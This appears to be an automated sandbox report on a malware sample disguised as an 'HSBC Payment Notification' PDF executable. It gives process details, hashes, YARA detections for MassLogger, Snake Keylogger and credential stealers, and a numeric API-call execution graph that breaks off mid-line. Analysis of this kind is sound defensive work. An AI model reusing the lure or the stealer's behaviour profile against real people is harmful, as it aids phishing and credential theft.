                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:10:24:09
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'539'072 bytes
                                                                                                                                                  MD5 hash:999146408EFD1A704966CA4C1C8CE4B7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'445'888 bytes
                                                                                                                                                  MD5 hash:423F1F6668442F29DF26625C3F1F2479
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                  File size:45'984 bytes
                                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:10:24:10
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\alg.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'381'376 bytes
                                                                                                                                                  MD5 hash:463F7F1E3383EFC2DF1C247DF13BE675
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:10:24:14
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'242'624 bytes
                                                                                                                                                  MD5 hash:5DA3CAFF7B6DB6ED124E5F9690E7B126
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:10:24:17
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:2'354'176 bytes
                                                                                                                                                  MD5 hash:0B79C87888F1F817B9EF1809AC8DC7F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:10:24:17
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'512'448 bytes
                                                                                                                                                  MD5 hash:680DFBE855D22EE0570837F07CDC45D4
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:10:24:18
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'434'112 bytes
                                                                                                                                                  MD5 hash:51874DD725C538D547DFE65FED3A93E2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:10:24:20
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'391'616 bytes
                                                                                                                                                  MD5 hash:55154595EBC76876D16839386F302C81
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:10:24:21
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'306'624 bytes
                                                                                                                                                  MD5 hash:436D2153822038C49A041E9D657F7E2D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:10:24:22
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\Locator.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'296'896 bytes
                                                                                                                                                  MD5 hash:E30FA2BCFDF4D20217D89B9395BE104F
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:10:24:24
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'846'784 bytes
                                                                                                                                                  MD5 hash:138460F80D6D680988322149C0DA8337
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:10:24:25
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'302'528 bytes
                                                                                                                                                  MD5 hash:772AEFCF949CAADFB515863053AC8C10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:20
                                                                                                                                                  Start time:11:32:40
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'455'616 bytes
                                                                                                                                                  MD5 hash:A5C5CBD638C50F62E6B1C909D40EA394
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:22
                                                                                                                                                  Start time:11:32:41
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'667'072 bytes
                                                                                                                                                  MD5 hash:56CCD164B03367A0F39A8360E82CB3D1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:23
                                                                                                                                                  Start time:11:32:42
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'611'264 bytes
                                                                                                                                                  MD5 hash:978A54C9D759FF632658D6B5D6F278B3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:24
                                                                                                                                                  Start time:11:32:43
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'801'216 bytes
                                                                                                                                                  MD5 hash:7CFA6C3EAA73B924E9F391CE7ED6CFFF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:11:32:44
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\vds.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:1'303'552 bytes
                                                                                                                                                  MD5 hash:9B69326495A6A2E148AF298DBBFA354E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:27
                                                                                                                                                  Start time:11:32:46
                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                  Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  File size:2'164'736 bytes
                                                                                                                                                  MD5 hash:A4B1E47A80405B400B4460F9F65BA8E2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:3.4%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:27.9%
                                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:157
                                                                                                                                                    execution_graph 180072 2f19771 180073 2f18e46 180072->180073 180075 2f18cc6 180072->180075 180073->180072 180073->180075 180076 2f1a6d0 180073->180076 180077 2f1a6e6 180076->180077 180081 2f1a7f7 180077->180081 180084 2f162e0 180077->180084 180079 2f1a700 180091 2f4f080 180079->180091 180081->180073 180082 2f1a737 180082->180081 180109 2f1e8f0 180082->180109 180085 2f15d9e 180084->180085 180085->180079 180085->180084 180086 2f15c10 _strlen 180085->180086 180088 2f15f4a 180085->180088 180090 2f15da4 180085->180090 180086->180079 180087 2f15df2 ReadFile 180087->180086 180088->180086 180089 2f15f1c SetFilePointerEx 180088->180089 180089->180079 180090->180086 180090->180087 180092 2f4f08d 180091->180092 180095 2f4f114 180091->180095 180094 2f4f0ba 180092->180094 180092->180095 180098 2f4f8bf 180094->180098 180132 2f50fab 21 API calls 2 library calls 180094->180132 180097 2f4f195 180095->180097 180104 2f4f16a 180095->180104 180096 2f4fe66 180096->180082 180101 2f4f1c8 180097->180101 180131 2f50570 21 API calls __startOneArgErrorHandling 180097->180131 180098->180082 180100 2f4f1b2 180100->180082 180101->180082 180102 2f506f7 180133 2f50587 21 API calls __startOneArgErrorHandling 180102->180133 180103 2f506fe 180134 2f50570 21 API calls __startOneArgErrorHandling 180103->180134 180104->180101 180104->180102 180104->180103 180107 2f506fc 180107->180082 180108 2f50703 180108->180082 180125 2f1e8ff 180109->180125 180110 2f1f2f0 WriteFile 180130 2f1ea1a 180110->180130 180112 2f1e329 WriteFile 180114 2f1e337 180112->180114 180118 2f1e3de 180112->180118 180113 2f1e452 180113->180112 180113->180118 180115 2f162e0 2 API calls 180114->180115 180114->180118 180116 2f33003 180115->180116 180117 2f32cbf 180116->180117 180119 2f33012 180116->180119 180120 2f162e0 2 API calls 180117->180120 180118->180081 180121 2f32c72 180119->180121 180126 2f33018 180119->180126 180122 2f32cc8 180120->180122 180123 2f162e0 2 API calls 180121->180123 180122->180081 180124 2f32c7b 180123->180124 180124->180081 180125->180081 180125->180110 180125->180113 180125->180114 180125->180130 180127 2f33059 180126->180127 180128 2f162e0 2 API calls 180126->180128 180127->180081 180129 2f3329e 180128->180129 180129->180081 180130->180081 180131->180100 180132->180096 180133->180107 180134->180108 180135 2f191f4 180212 2f18359 28 API calls 180135->180212 180137 2f18f67 180141 2f18eca 180137->180141 180161 2f1fa40 180137->180161 180138 2f1920c 180138->180138 180139 2f191af 180139->180135 180139->180137 180139->180138 180142 2f18795 180143 2f18476 180142->180143 180149 2f183d2 180142->180149 180154 2f183a4 180142->180154 180156 2f187b4 180142->180156 180157 2f183b7 180142->180157 180145 2f18376 180207 2f15bc0 180145->180207 180146 2f186d6 180148 2f15bc0 VirtualAlloc 180146->180148 180147 2f18359 180206 2f18390 VirtualAlloc 180147->180206 180148->180143 180152 2f15bc0 VirtualAlloc 180149->180152 180152->180154 180153 2f18362 180154->180143 180210 2f219a0 VirtualAlloc 180154->180210 180155 2f15bc0 VirtualAlloc 180155->180156 180156->180155 180159 2f187d5 180156->180159 180157->180143 180157->180145 180157->180147 180157->180149 180157->180154 180160 2f187f2 180159->180160 180211 2f18390 VirtualAlloc 180159->180211 180169 2f1fa47 180161->180169 180162 2f1fa4e SetFilePointerEx 180162->180169 180163 2f1e329 WriteFile 180166 2f1e337 180163->180166 180205 2f1e38d 180163->180205 180164 2f1fb21 SetFilePointerEx 180164->180205 180165 2f1fefb 180167 2f1ebb5 180165->180167 180168 2f1ff01 180165->180168 180170 2f162e0 2 API calls 180166->180170 180166->180205 180175 2f1ec01 SetFilePointerEx 180167->180175 180167->180205 180171 2f1e490 180168->180171 180172 2f1ff07 WriteFile 180168->180172 180169->180142 180169->180162 180169->180164 180169->180165 180174 2f1ee31 180169->180174 180188 2f1e300 180169->180188 180197 2f1e380 180169->180197 180203 2f1ec17 180169->180203 180204 2f1e929 180169->180204 180169->180205 180173 2f33003 180170->180173 180176 2f1e3e6 SetFilePointerEx 180171->180176 180171->180197 180172->180142 180177 2f32cbf 180173->180177 180179 2f33012 180173->180179 180178 2f1ee5d SetFilePointerEx 180174->180178 180174->180203 180174->180205 180175->180203 180175->180204 180194 2f1e363 180176->180194 180176->180205 180181 2f162e0 2 API calls 180177->180181 180180 2f1ee6b 180178->180180 180178->180204 180182 2f32c72 180179->180182 180192 2f33018 180179->180192 180183 2f1f849 180180->180183 180180->180203 180184 2f32cc8 180181->180184 180185 2f162e0 2 API calls 180182->180185 180187 2f1f524 WriteFile 180183->180187 180191 2f1f85e 180183->180191 180184->180142 180190 2f32c7b 180185->180190 180186 2f1e6c4 ReadFile 180186->180205 180189 2f1f541 180187->180189 180187->180204 180188->180163 180188->180205 180189->180142 180190->180142 180191->180142 180193 2f33059 180192->180193 180195 2f162e0 2 API calls 180192->180195 180193->180142 180194->180188 180196 2f1e3a8 SetFilePointerEx 180194->180196 180194->180197 180200 2f1e77a 180194->180200 180198 2f3329e 180195->180198 180196->180194 180196->180197 180197->180186 180197->180188 180201 2f1e6c3 180197->180201 180197->180205 180198->180142 180199 2f1f2f0 WriteFile 180199->180205 180200->180142 180201->180186 180203->180166 180203->180188 180203->180197 180203->180204 180203->180205 180204->180142 180204->180166 180204->180188 180204->180199 180204->180205 180205->180142 180206->180153 180208 2f15bcd VirtualAlloc 180207->180208 180209 2f15bc9 180207->180209 180208->180147 180209->180208 180210->180146 180211->180159 180212->180139 180213 40e48c 180216 40ccba 180213->180216 180215 40e498 180217 40ccd2 180216->180217 180224 40cd26 180216->180224 180217->180224 180225 409ea0 180217->180225 180220 4425bc 180220->180220 180221 40cd4f 180221->180215 180222 40cd09 180222->180221 180249 409d3c 60 API calls Mailbox 180222->180249 180224->180221 180250 469e4a 89 API calls 4 library calls 180224->180250 180226 409ebf 180225->180226 180237 409eed Mailbox 180225->180237 180251 420db6 180226->180251 180228 40b475 180264 408047 180228->180264 180229 40b47a 180232 4409e5 180229->180232 180233 440055 180229->180233 180231 456e8f 59 API calls 180231->180237 180270 469e4a 89 API calls 4 library calls 180232->180270 180263 469e4a 89 API calls 4 library calls 180233->180263 180234 407667 59 API calls 180234->180237 180237->180228 180237->180229 180237->180231 180237->180233 180237->180234 180239 40a057 180237->180239 180240 422d40 67 API calls __cinit 180237->180240 180242 420db6 59 API calls Mailbox 180237->180242 180245 408047 59 API calls 180237->180245 180246 4409d6 180237->180246 180248 40a55a 180237->180248 180261 40c8c0 341 API calls 2 library calls 180237->180261 180262 40b900 60 API calls Mailbox 180237->180262 180239->180222 180240->180237 180241 440064 180241->180222 180242->180237 180245->180237 180269 469e4a 89 API calls 4 library calls 180246->180269 180268 469e4a 89 API calls 4 library calls 180248->180268 180249->180224 180250->180220 180254 420dbe 180251->180254 180253 420dd8 180253->180237 180254->180253 180256 420ddc std::exception::exception 180254->180256 180271 42571c 180254->180271 180288 4233a1 DecodePointer 180254->180288 180289 42859b RaiseException 180256->180289 180258 420e06 180290 4284d1 58 API calls _free 180258->180290 180260 420e18 180260->180237 180261->180237 180262->180237 180263->180241 180265 408052 180264->180265 180266 40805a 180264->180266 180299 407f77 180265->180299 180266->180239 180268->180239 180269->180232 180270->180239 180272 425797 180271->180272 180276 425728 180271->180276 180297 4233a1 DecodePointer 180272->180297 180274 42579d 180298 428b28 58 API calls __getptd_noexit 180274->180298 180278 425733 180276->180278 180279 42575b RtlAllocateHeap 180276->180279 180282 425783 180276->180282 180286 425781 180276->180286 180294 4233a1 DecodePointer 180276->180294 180278->180276 180291 42a16b 58 API calls __NMSG_WRITE 180278->180291 180292 42a1c8 58 API calls 5 library calls 180278->180292 180293 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 180278->180293 180279->180276 180280 42578f 180279->180280 180280->180254 180295 428b28 58 API calls __getptd_noexit 180282->180295 180296 428b28 58 API calls __getptd_noexit 180286->180296 180288->180254 180289->180258 180290->180260 180291->180278 180292->180278 180294->180276 180295->180286 180296->180280 180297->180274 180298->180280 180300 407f9a _memmove 180299->180300 180301 407f87 180299->180301 180300->180266 180301->180300 180302 420db6 Mailbox 59 API calls 180301->180302 180302->180300 180303 2f1adbd 180304 2f1aeda SetFilePointerEx 180303->180304 180305 2f1adcd 180303->180305 180305->180304 180306 2f1597d 180307 2f15981 180306->180307 180308 2f15915 CreateThread 180306->180308 180307->180308 180311 2f15884 180307->180311 180309 2f15917 180308->180309 180310 2f158fc CloseHandle 180309->180310 180318 2f15920 180309->180318 180310->180309 180314 2f15ad8 CreateThread 180311->180314 180316 2f15b36 CloseHandle 180311->180316 180317 2f15af6 180311->180317 180324 2f158b6 180311->180324 180326 2f15870 180311->180326 180344 2f148fe 180311->180344 180313 2f158c7 RtlExitUserThread 180314->180311 180314->180316 180377 2f154f0 180314->180377 180316->180318 180316->180344 180317->180311 180317->180318 180320 2f15b1c 180317->180320 180373 2f148f0 6 API calls _wcslen 180317->180373 180318->180326 180329 2f15144 180318->180329 180333 2f1528a 180318->180333 180336 2f14f33 180318->180336 180318->180344 180371 2f149f0 GetUserDefaultLangID GetUserDefaultUILanguage 180318->180371 180372 2f15c10 82 API calls 2 library calls 180318->180372 180320->180316 180320->180318 180334 2f14a0f 180320->180334 180320->180344 180321 2f153f7 Sleep 180323 2f15273 ReleaseMutex CloseHandle 180321->180323 180327 2f1540e 180321->180327 180323->180333 180324->180313 180324->180344 180325 2f14f50 RtlExitUserThread 180325->180334 180326->180318 180326->180321 180326->180324 180326->180334 180326->180344 180345 2f37960 180326->180345 180327->180323 180327->180329 180327->180334 180328 2f15bc0 VirtualAlloc 180328->180334 180332 2f15268 180329->180332 180329->180334 180337 2f14e3a 180329->180337 180329->180344 180330 2f1500a Sleep 180330->180336 180332->180323 180333->180344 180334->180325 180334->180328 180334->180330 180335 2f14db0 GetSystemDefaultLangID 180334->180335 180334->180336 180340 2f149f0 180334->180340 180343 2f14a02 180334->180343 180334->180344 180335->180334 180335->180343 180336->180330 180336->180333 180336->180334 180336->180343 180336->180344 180338 2f14e3c GetUserDefaultUILanguage 180337->180338 180337->180344 180339 2f14b9d 180338->180339 180340->180338 180340->180343 180340->180344 180341 2f14be2 GetUserDefaultLangID 180342 2f14bea 180341->180342 180341->180343 180343->180341 180343->180344 180348 2f378e1 180345->180348 180346 2f37924 GetWindowsDirectoryW 180346->180348 180350 2f378c0 180346->180350 180347 2f37b41 GetLastError 180347->180348 180348->180345 180348->180346 180348->180347 180349 2f37bc4 GetWindowsDirectoryW 180348->180349 180348->180350 180351 2f37d75 180348->180351 180352 2f37dd0 GetUserNameW 180348->180352 180355 2f3809e GetLastError 180348->180355 180356 2f38019 GetVolumeInformationW 180348->180356 180357 2f37bb6 180348->180357 180358 2f37ab1 180348->180358 180359 2f37f6f 180348->180359 180361 2f38048 180348->180361 180366 2f3805f GetUserNameW 180348->180366 180368 2f378c7 GetVolumeInformationW 180348->180368 180369 2f37eee GetComputerNameW 180348->180369 180370 2f37e1a GetLastError 180348->180370 180349->180326 180350->180326 180374 2f1482b 46 API calls _strlen 180351->180374 180352->180348 180354 2f37d7a 180354->180326 180355->180326 180356->180361 180357->180349 180364 2f37c96 180357->180364 180358->180357 180358->180359 180375 2f1482b 46 API calls _strlen 180359->180375 180376 2f1482b 46 API calls _strlen 180361->180376 180362 2f37f79 180362->180326 180364->180326 180365 2f3804d 180365->180326 180366->180348 180367 2f38071 180366->180367 180367->180326 180368->180348 180368->180350 180369->180348 180370->180326 180371->180318 180372->180318 180373->180317 180374->180354 180375->180362 180376->180365 180378 2f154f4 180377->180378 180379 2f1aeff SetFilePointerEx 180380 2f1ae1c 180379->180380 180389 2f19b88 180379->180389 180381 2f1adfc 180380->180381 180382 2f187b4 180380->180382 180385 2f1ae0d WriteFile 180381->180385 180390 2f183f8 180381->180390 180384 2f15bc0 VirtualAlloc 180382->180384 180386 2f187d5 180382->180386 180382->180390 180384->180382 180385->180381 180385->180390 180387 2f187f2 180386->180387 180454 2f18390 VirtualAlloc 180386->180454 180388 2f19e9c SetFilePointerEx 180389->180390 180391 2f19e6e 180389->180391 180392 2f19aea 180389->180392 180395 2f18e1a 180389->180395 180398 2f19d94 180389->180398 180426 2f19d59 180389->180426 180393 2f19e74 180391->180393 180421 2f18ec5 180391->180421 180392->180390 180394 2f162e0 2 API calls 180392->180394 180392->180426 180396 2f19e86 180393->180396 180393->180426 180394->180392 180395->180390 180397 2f1945e 180395->180397 180402 2f1fd47 180395->180402 180416 2f18760 180395->180416 180395->180421 180396->180398 180410 2f183b7 180396->180410 180434 2f1e300 180397->180434 180398->180388 180398->180390 180399 2f1883d 180399->180386 180399->180390 180405 2f18350 180399->180405 180399->180410 180400 2f19799 ReadFile 180400->180416 180400->180421 180403 2f3a895 180402->180403 180456 2f1482b 46 API calls _strlen 180402->180456 180405->180390 180452 2f18390 VirtualAlloc 180405->180452 180406 2f18340 180406->180405 180408 2f15bc0 VirtualAlloc 180406->180408 180407 2f183d2 180411 2f15bc0 VirtualAlloc 180407->180411 180408->180405 180410->180390 180410->180405 180410->180406 180410->180407 180419 2f183a4 180410->180419 180411->180419 180413 2f18362 180414 2f186d6 180415 2f15bc0 VirtualAlloc 180414->180415 180415->180390 180416->180382 180416->180390 180416->180399 180416->180407 180416->180410 180416->180419 180417 